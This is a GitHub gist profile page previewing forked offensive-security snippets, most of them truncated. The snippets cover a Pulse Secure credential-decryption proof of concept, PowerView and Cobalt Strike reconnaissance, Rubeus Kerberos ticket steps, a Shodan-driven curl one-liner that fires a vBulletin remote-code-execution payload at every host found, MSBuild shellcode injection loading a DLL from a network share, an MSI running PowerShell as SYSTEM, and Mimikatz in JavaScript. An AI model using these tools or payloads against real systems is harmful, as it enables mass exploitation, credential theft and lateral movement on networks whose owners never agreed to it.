Skip to content

Instantly share code, notes, and snippets.


unbaiat unbaiat

View GitHub Profile
unbaiat / CVE-2020-8956.ps1
Created Oct 29, 2020 — forked from QKaiser/CVE-2020-8956.ps1
CVE-2020-8956 - Powershell PoC
View CVE-2020-8956.ps1
Add-Type -AssemblyName System.Security;
$ives = Get-ItemProperty -Path 'Registry::HKEY_USERS\*\Software\Pulse Secure\Pulse\User Data\*'
foreach($ive in $ives) {
$ivename = $ive.PSPath.split('\')[-1].ToUpper()
Write-Host "[+] Checking IVE $($ivename)..."
$seed = [System.Text.Encoding]::GetEncoding('UTF-16').getBytes($ivename)
# 3 possible value names for password
$encrypted = $ive.Password1
unbaiat / PowerView-3.0-tricks.ps1
Created Oct 15, 2020 — forked from HarmJ0y/PowerView-3.0-tricks.ps1
PowerView-3.0 tips and tricks
View PowerView-3.0-tricks.ps1
# PowerView's last major overhaul is detailed here:
# tricks for the 'old' PowerView are at
# the most up-to-date version of PowerView will always be in the dev branch of PowerSploit:
# New function naming schema:
# Verbs:
# Get : retrieve full raw data sets
# Find : ‘find’ specific data entries in a data set
unbaiat / cobaltstrike_sa.txt
Created Oct 15, 2020 — forked from HarmJ0y/cobaltstrike_sa.txt
Cobalt Strike Situational Awareness Commands
View cobaltstrike_sa.txt
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
View gist:512f813eafda92406ae753890be43482
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
View vBulletin RCE shodan
shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done;
# This is not great...
View msbuild_inline_task_parent_process_spoof.txt
<Project xmlns="">
<Target Name="MyTarget">
<SimpleTask MyProperty="My voice is my passport."
MyCode='<base64 encoded x64 shellcode>'
MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/>
<UsingTask TaskName="SimpleTask" AssemblyFile="\\\share\IEShims.dll" />
unbaiat / msigen.wix
Created Jan 4, 2020 — forked from xpn/msigen.wix
WIX file with embedded Powershell, which will be executed as SYSTEM
View msigen.wix
<?xml version="1.0"?>
<Wix xmlns="">
<Product Id="*" UpgradeCode="12345678-1234-1234-1234-111111111111" Name="Example Product Name" Version="0.0.1" Manufacturer="@_xpn_" Language="1033">
<Package InstallerVersion="200" Compressed="yes" Comments="Windows Installer Package"/>
<Media Id="1" Cabinet="" EmbedCab="yes"/>
<Directory Id="TARGETDIR" Name="SourceDir">
<Directory Id="ProgramFilesFolder">
<Directory Id="INSTALLLOCATION" Name="Example">
<Component Id="ApplicationFiles" Guid="12345678-1234-1234-1234-222222222222">
unbaiat / tasks.cs
Created Jan 4, 2020 — forked from xpn/tasks.cs
Create a .NET Type Dynamically at Runtime, Execute in Script. Prototype DynamicWrapperX , but not posting that publicly
View tasks.cs
using System;
using System.EnterpriseServices;
using System.Runtime.InteropServices;
using System.Reflection;
using System.Reflection.Emit;
using System.Collections;
using System.Collections.Generic;
unbaiat / tz.js
Last active Dec 10, 2019 — forked from hardw00t/mimikatz.js
Mimikatz.exe in JS
View tz.js
This file has been truncated, but you can view the full file.
var serialized_obj2 = [
You can’t perform that action at this time.